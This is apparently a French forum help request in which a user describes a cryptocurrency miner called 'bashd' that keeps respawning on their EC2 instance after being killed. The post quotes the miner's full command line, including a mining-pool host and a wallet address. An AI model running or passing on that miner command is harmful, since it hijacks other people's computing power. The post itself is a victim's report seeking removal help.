J'ai trouvé un malware sur mon instance ec2 qui exploitait continuellement le bitcoin et utilisait la puissance de traitement de mon instance. J'ai réussi à identifier le processus, mais je n'ai pas pu le supprimer et le tuer.
J'ai exécuté cette commande.
watch "ps aux | sort -nrk 3,3 | head -n 5"
Elle montre les cinq premiers processus en cours d'exécution sur mon instance, à partir desquels j'ai trouvé qu'il existe un nom de processus « bashd » qui consommait 30% de CPU. Le processus est
bashd -a cryptonight -o stratum+tcp://get.bi-chi.com:3333 -u 47EAoaBc5TWDZKVaAYvQ7Y4ZfoJMFathAR882gabJ43wHEfxEp81vfJ3J3j6FQGJxJNQTAwvmJYS2Ei8dbkKcwfPFst8FhG -p x
J'ai tué ce processus en utilisant la kill -9 process_id
commande. Après 5 secondes, le processus a recommencé.